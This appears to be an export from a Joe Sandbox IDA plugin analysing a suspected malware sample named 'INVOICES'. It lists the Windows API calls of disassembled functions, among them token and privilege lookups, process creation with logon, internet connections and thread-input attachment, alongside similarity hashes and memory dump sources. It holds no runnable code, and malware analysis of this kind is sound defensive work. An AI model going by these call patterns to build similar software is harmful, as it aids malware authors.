• Opcode Fuzzy Hash: 7b589626c2e790d480bd39623e0335da94ed1575677c19419bc874315145c5b8
• Instruction Fuzzy Hash: 00A14975204701DFDB50DF14C885B2AB7E4BF89720F048559FA9A9B3A2CB78ED04CB46
APIs
• ProgIDFromCLSID.COMBASE(?,00000000), ref: 00787A12
• CoTaskMemFree.COMBASE(00000000), ref: 00787A2A
• CLSIDFromProgID.COMBASE(?,?), ref: 00787A4F
• _memcmp.LIBCMT ref: 00787A70
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
• Opcode ID: 137eaeba9690869308b168417e5124b5abe40151b554b5de00ad729d185ddd90
• Instruction ID: 289dbf9fb962ebb5597a6a1b337117f5331220beae57221ad0047b965e88c698
• Opcode Fuzzy Hash: 137eaeba9690869308b168417e5124b5abe40151b554b5de00ad729d185ddd90
• Instruction Fuzzy Hash: 7C810B71A00109EFCB04DF94C988EEEB7B9FF89315F208598E516AB250DB75AE05CB61
APIs
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
• Opcode ID: dfe07d601666826d448f16173e566c6bc57900e93b46cfd03782614a488356a3
• Instruction ID: 516387f95a2a6158c38d2284d1dd2dd35ba60b69f25a86f70ea17af4d2644f81
• Opcode Fuzzy Hash: dfe07d601666826d448f16173e566c6bc57900e93b46cfd03782614a488356a3
• Instruction Fuzzy Hash: CA51A134784306FBDF24BF65D899A6AB3E5EF44310F20882FE596CB291DE789840C725
APIs
• GetWindowRect.USER32(010CF568,?), ref: 007B9895
• ScreenToClient.USER32(00000002,00000002), ref: 007B98C8
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007B9935
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: 812189b5a73341d6fe1eb5859c29494336b29d9a46b7ddd76439736e04bd75e2
• Instruction ID: f9134eb25d5b425ef1c2d4e32b5384029d9a68d9c4eac07f2ba6280dbaebe76a
• Opcode Fuzzy Hash: 812189b5a73341d6fe1eb5859c29494336b29d9a46b7ddd76439736e04bd75e2
• Instruction Fuzzy Hash: 89514134A00609EFCF14DF64D884AEE7BB5FF85360F108159FA659B2A0D735AD41CB90
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0079B92A
• GetLastError.KERNEL32(?,00000000), ref: 0079B950
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0079B975
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0079B9A1
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 995aec8e4492a5254341b7341d07ced61b67ccf955cc63fb53d8cc29e1acd5d3
• Instruction ID: 212939f3c1e153eaa6424e0897d86a49dd678db01ceb6774759d0e3c1bfb4d8e
• Opcode Fuzzy Hash: 995aec8e4492a5254341b7341d07ced61b67ccf955cc63fb53d8cc29e1acd5d3
• Instruction Fuzzy Hash: 8B411A39600610DFDF10EF15D948A5DBBE5EF89320F098088E94A9B762CB78FD00DB91
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007B8910
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: c59d4487536c177bbc098a8e127a0c27417c5f4481ae2e7360d999d58fd902e5
• Instruction ID: 1a0d09075b41861a936c970d292e68b08070318136540086abdc98d1e4184d35
• Opcode Fuzzy Hash: c59d4487536c177bbc098a8e127a0c27417c5f4481ae2e7360d999d58fd902e5
• Instruction Fuzzy Hash: E031AF34601108FFEFA09A58CC49FF83B69EB05360F544625FA51E62E1CE39F980DA53
APIs
• ClientToScreen.USER32(?,?), ref: 007BAB92
• GetWindowRect.USER32(?,?), ref: 007BAC08
• PtInRect.USER32(?,?,007BC07E), ref: 007BAC18
• MessageBeep.USER32(00000000), ref: 007BAC89
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: 41d17a0c9164e61a507749324b42320201d5f06020edd1a1d7a087e2e0b33628
• Instruction ID: 1c314b6a78dbc25ef7117c70260b6e2581b77959f24722385159bca3592cef57
• Opcode Fuzzy Hash: 41d17a0c9164e61a507749324b42320201d5f06020edd1a1d7a087e2e0b33628
• Instruction Fuzzy Hash: 79416C70A00615EFCF12EF58C885FA97BF5FB48750F1481A9E914CB261D738A845DBA2
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0076637B
• __isleadbyte_l.LIBCMT ref: 007663A9
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007663D7
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0076640D
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 6578dae225733785937a1fc3663c9f8a31efcc2f1f27fe1fd7ef520a0d17b0ca
• Instruction ID: a876506e29ddaa02d356e28556bc2015a8f7637903c14b02015002824a205a6a
• Opcode Fuzzy Hash: 6578dae225733785937a1fc3663c9f8a31efcc2f1f27fe1fd7ef520a0d17b0ca
• Instruction Fuzzy Hash: 4731A131600286EFDF218F66CC84BBA7FA9FF41310F554529EC1697291EB39E950DB50
APIs
• GetForegroundWindow.USER32 ref: 007B4F6B
  • Part of subcall function 00793685: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0079369F
  • Part of subcall function 00793685: GetCurrentThreadId.KERNEL32 ref: 007936A6
  • Part of subcall function 00793685: AttachThreadInput.USER32(00000000,?,007950AC), ref: 007936AD
• GetCaretPos.USER32(?), ref: 007B4F7C
• ClientToScreen.USER32(00000000,?), ref: 007B4FB7
• GetForegroundWindow.USER32 ref: 007B4FBD
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2759813231-0
                                                                                                                                  • Opcode ID: f0b0bb2adec83002ae1afc23289752b0fb74ba70b70c50699e06e70e88105816
                                                                                                                                  • Instruction ID: 3da9751bf1741aee9a8cdc775db0e70b4764f5bb5fe0e74c4c0d83b89c9e927d
                                                                                                                                  • Opcode Fuzzy Hash: f0b0bb2adec83002ae1afc23289752b0fb74ba70b70c50699e06e70e88105816
                                                                                                                                  • Instruction Fuzzy Hash: 65312F71900108AFDB04EFA5CD45AEFB7F9EF88300F10816AE545E7202EA795E01CBA0
APIs
  • Part of subcall function 00788432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00788449
  • Part of subcall function 00788432: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00788453
  • Part of subcall function 00788432: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00788462
  • Part of subcall function 00788432: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00788469
  • Part of subcall function 00788432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0078847F
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007889CB
• _memcmp.LIBCMT ref: 007889EE
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00788A24
• HeapFree.KERNEL32(00000000), ref: 00788A2B
Similarity
• API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
• String ID:
• API String ID: 2182266621-0
• Opcode ID: 7742800830a0fc9a78356df3d835e9c5bdcbe786f0136562aaeaa253d658bac6
• Instruction ID: 5b974fb39eb58fb20385046bb5729755836a09a6038519870515c038244aa85f
• Opcode Fuzzy Hash: 7742800830a0fc9a78356df3d835e9c5bdcbe786f0136562aaeaa253d658bac6
• Instruction Fuzzy Hash: D921B071E80108EFCB14EFA4C945BEEB7B8EF44301F44805AE455A7241EB38AE05CF52
APIs
• __setmode.LIBCMT ref: 00750B2E
  • Part of subcall function 00735B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,0079793F,?,?,00000000), ref: 00735B8C
  • Part of subcall function 00735B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,0079793F,?,?,00000000,?,?), ref: 00735BB0
• _fprintf.LIBCMT ref: 00750B65
• OutputDebugStringW.KERNEL32(?), ref: 00786111
  • Part of subcall function 00754C1A: _flsall.LIBCMT ref: 00754C33
• __setmode.LIBCMT ref: 00750B9A
Similarity
• API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
• String ID:
• API String ID: 521402451-0
• Opcode ID: 266a6747c2e3f7a2e9cab71977098bbded40707009137c2e758bc259fe56282c
• Instruction ID: 50a398867979fb7f314d827599faa667f52d3584e21ad752c12cd95a0572072e
• Opcode Fuzzy Hash: 266a6747c2e3f7a2e9cab71977098bbded40707009137c2e758bc259fe56282c
• Instruction Fuzzy Hash: CB115772904204FAEB0077A49C8AEFD7B6DAF41326F14411AF50453183DEAC588943E5
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007A18B9
  • Part of subcall function 007A1943: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007A1962
  • Part of subcall function 007A1943: InternetCloseHandle.WININET(00000000), ref: 007A19FF
Similarity
• API ID: Internet$CloseConnectHandleOpen
• String ID:
• API String ID: 1463438336-0
• Opcode ID: 2c970dba344ed1dc75e8460517aafd187a2b2338dfa8cc37c1cb23704a663bbe
• Instruction ID: cadb81b617c3965693aa84eca614bb9aa8c6e3e0a8d780b2c4f0ac4340bb444f
• Opcode Fuzzy Hash: 2c970dba344ed1dc75e8460517aafd187a2b2338dfa8cc37c1cb23704a663bbe
• Instruction Fuzzy Hash: 84210131200701BFEB158F648C10FBBB7ADFF8A700F50422AFA0596251CB39E821D790
APIs
• GetFileAttributesW.KERNEL32(?,007BFAC0), ref: 00793AA8
• GetLastError.KERNEL32 ref: 00793AB7
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00793AC6
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,007BFAC0), ref: 00793B23
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
• Opcode ID: 6e6bfca1063b0560785c78477d943ddfeb2cc62e956595b427f715f8281fa757
• Instruction ID: 874e92dca6191870a003a08b22997dcce458b174156261dd687d519521ae2611
• Opcode Fuzzy Hash: 6e6bfca1063b0560785c78477d943ddfeb2cc62e956595b427f715f8281fa757
• Instruction Fuzzy Hash: 8021B1B05082019FCB10DF28DC8499EB7E8EE15724F148A1AF499C72A2D7389E05CB82
APIs
• _free.LIBCMT ref: 00765281
  • Part of subcall function 0075588C: __FF_MSGBANNER.LIBCMT ref: 007558A3
  • Part of subcall function 0075588C: __NMSG_WRITE.LIBCMT ref: 007558AA
  • Part of subcall function 0075588C: RtlAllocateHeap.NTDLL(010B0000,00000000,00000001), ref: 007558CF
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: b71a3a4505c18e5f2a0ab355606578f00e5aeb29851e7a1bbff0066d33627902
• Instruction ID: fbba1d40988e5deea8ef49e11fce7e050fa125cd03847ae8ab1262e102b73a6d
• Opcode Fuzzy Hash: b71a3a4505c18e5f2a0ab355606578f00e5aeb29851e7a1bbff0066d33627902
• Instruction Fuzzy Hash: 13110A72501A15DFDB203F74AC1979E3798BF00362F204629FC06EA150DE7C8D449765
APIs
• _memset.LIBCMT ref: 00734560
  • Part of subcall function 0073410D: _memset.LIBCMT ref: 0073418D
  • Part of subcall function 0073410D: _wcscpy.LIBCMT ref: 007341E1
  • Part of subcall function 0073410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007341F1
• KillTimer.USER32(?,00000001,?,?), ref: 007345B5
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007345C4
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0076D5FE
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1378193009-0
                                                                                                                                  • Opcode ID: d32b7c23052b50aa8c48994cb042a729fff84f68c206551887d812584f88fae3
                                                                                                                                  • Instruction ID: 91ff92232e47d0a5e8aebbc61c1042fea1d15244c66ced3f04a41c8d45987c75
                                                                                                                                  • Opcode Fuzzy Hash: d32b7c23052b50aa8c48994cb042a729fff84f68c206551887d812584f88fae3
                                                                                                                                  • Instruction Fuzzy Hash: 9921C8B0D047849FEB328B24DC59BE7BBECAB11308F04409EE69B56142D7782E94CB55
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0078890A
• OpenProcessToken.ADVAPI32(00000000), ref: 00788911
• CloseHandle.KERNEL32(00000004), ref: 0078892B
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0078895A
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
• String ID:
• API String ID: 2621361867-0
• Opcode ID: fc488c731c6e4aff114502a0b1a41a1bb27079fa6cd2c7c3e8321869c81d0e11
• Instruction ID: 6e0cae7a23feedc46e7b51385fd009ca6c8953c3ef4dc4b37534ca7fa0386efb
• Opcode Fuzzy Hash: fc488c731c6e4aff114502a0b1a41a1bb27079fa6cd2c7c3e8321869c81d0e11
• Instruction Fuzzy Hash: 42115C72540209ABDF01DFA8DD49FEE7BA9FF08708F444164FE04A2160C7799D609B62
APIs
  • Part of subcall function 00735B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,0079793F,?,?,00000000), ref: 00735B8C
  • Part of subcall function 00735B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,0079793F,?,?,00000000,?,?), ref: 00735BB0
• gethostbyname.WS2_32(?), ref: 007A64AF
• WSAGetLastError.WS2_32(00000000), ref: 007A64BA
• _memmove.LIBCMT ref: 007A64E7
• inet_ntoa.WS2_32(?), ref: 007A64F2
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 1504782959-0
• Opcode ID: 3a02811e8f2af38f5b0c60212c6736572ef4165120a268e6690b892f88de9c05
• Instruction ID: 4395efff8b82fd377c7cafdfdc4252a98d14ba32886e9546b19a4d788f58c5f1
• Opcode Fuzzy Hash: 3a02811e8f2af38f5b0c60212c6736572ef4165120a268e6690b892f88de9c05
• Instruction Fuzzy Hash: 64115E71900508EFCB04FBA4DD8ADEEB7B8AF48310B148165F506A7162DF78AF14DB61
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00788E23
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00788E35
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00788E4B
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00788E66
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: edd0008a04626a5eb79c6ac005bfcde0a6ef73fe646941b27a8cf4735f844f52
• Instruction ID: 28dbbd9fed5abd86ca727603fe0f419a06c0c8d6ce7e1c36d70e7a681c8c03d3
• Opcode Fuzzy Hash: edd0008a04626a5eb79c6ac005bfcde0a6ef73fe646941b27a8cf4735f844f52
• Instruction Fuzzy Hash: E4114879940218FFEB10EFA5CC84E9DBBB8FB08710F204195E900B7290DA716E10DB94
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0079001E,?,00791071,?,00008000), ref: 00791490
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,0079001E,?,00791071,?,00008000), ref: 007914B5
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0079001E,?,00791071,?,00008000), ref: 007914BF
• Sleep.KERNEL32(?,?,?,?,?,?,?,0079001E,?,00791071,?,00008000), ref: 007914F2
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: d3d046c173c85e922d5c8ed8c9d2400e8c45fd2f22b6056047fc6b52f16ee717
• Instruction ID: 861a5a1f009af62ce79a7157eeb6c4223d2360e0eb6a5a216c1fb2fc90159860
• Opcode Fuzzy Hash: d3d046c173c85e922d5c8ed8c9d2400e8c45fd2f22b6056047fc6b52f16ee717
• Instruction Fuzzy Hash: 7B117C32C0056EDBCF00DFA9E989BEEBB78FF0DB11F808555E941B6250CB3895608B95
APIs
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction ID: 052db0b7ee9de9936c5f9b006e796218bb09c1f62ac7553912992fdbfd9f66f9
• Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction Fuzzy Hash: 7D017E3204814EFBCF1A5E84CC058EE3F26BF59388B188416FE1958131C33AC9B1EB81
APIs
• GetWindowRect.USER32(?,?), ref: 007BB318
• ScreenToClient.USER32(?,?), ref: 007BB330
• ScreenToClient.USER32(?,?), ref: 007BB354
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007BB36F
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: 1768d1364cf5199b18b484b2d816885610e9101d3400af4cb6b28ab3f0ab30af
• Instruction ID: 6b3576189bf0a4965251ab7b7306fc54e377c6840c1deb43c57a0ac66b8a9cf2
• Opcode Fuzzy Hash: 1768d1364cf5199b18b484b2d816885610e9101d3400af4cb6b28ab3f0ab30af
• Instruction Fuzzy Hash: A3114675D00209EFDB41CF99C844AEEBBF5FB08314F108166E914E3220D775AA558F54
APIs
• _memset.LIBCMT ref: 007BB678
• _memset.LIBCMT ref: 007BB687
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007F6F20,007F6F64), ref: 007BB6B6
• CloseHandle.KERNEL32 ref: 007BB6C8
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID:
• API String ID: 3277943733-0
• Opcode ID: 14637baa2a88c60bc3b987affde9990ff86f12ce5a9ad5ece0f43dda8c1efa19
• Instruction ID: 207d2638896e7dfa93e255948bfd14987e15346e2ab735958e21b74834eda068
• Opcode Fuzzy Hash: 14637baa2a88c60bc3b987affde9990ff86f12ce5a9ad5ece0f43dda8c1efa19
• Instruction Fuzzy Hash: 90F0F4B1540304BAE2102765BC05FB77BDDEB05755F048035FA08D6196D77E5C10C7AC
APIs
• RtlEnterCriticalSection.NTDLL(?), ref: 00796C8F
  • Part of subcall function 0079776D: _memset.LIBCMT ref: 007977A2
• _memmove.LIBCMT ref: 00796CB2
• _memset.LIBCMT ref: 00796CBF
• RtlLeaveCriticalSection.NTDLL(?), ref: 00796CCF
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: CriticalSection_memset$EnterLeave_memmove
• String ID:
• API String ID: 48991266-0
• Opcode ID: eb1a308546a1bcc6b648e184c60f185a6207898afba9d692b8e2a84259081f3c
• Instruction ID: 637cfe2b3bc0768916f2c4b97d00cbe8a97935397515d411543ef1fc0821a9dc
• Opcode Fuzzy Hash: eb1a308546a1bcc6b648e184c60f185a6207898afba9d692b8e2a84259081f3c
• Instruction Fuzzy Hash: 3FF0303A104104ABCF416F95EC89E89BB29FF45321B04C065FE089E25AC775A811CBB5
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0078A179
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0078A18C
• GetCurrentThreadId.KERNEL32 ref: 0078A193
• AttachThreadInput.USER32(00000000), ref: 0078A19A
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 4831a0399e50618cafa2fe92965bdaee8d38c6938db8267f24a142b8b0769206
• Instruction ID: 4a5ca093df791bec09f03dbaae44d409aee52efcf90212c5e20e0554e62fd167
• Opcode Fuzzy Hash: 4831a0399e50618cafa2fe92965bdaee8d38c6938db8267f24a142b8b0769206
• Instruction Fuzzy Hash: 23E0ED3198522CBAEB206FA6DC0DFD77F6CEF26BA1F408125F909D5060C6799540CBA5
APIs
• GetSysColor.USER32(00000008), ref: 00732231
• SetTextColor.GDI32(?,000000FF), ref: 0073223B
• SetBkMode.GDI32(?,00000001), ref: 00732250
• GetStockObject.GDI32(00000005), ref: 00732258
• GetWindowDC.USER32(?,00000000), ref: 0076C003
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0076C010
• GetPixel.GDI32(00000000,?,00000000), ref: 0076C029
• GetPixel.GDI32(00000000,00000000,?), ref: 0076C042
• GetPixel.GDI32(00000000,?,?), ref: 0076C062
• ReleaseDC.USER32(?,00000000), ref: 0076C06D
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
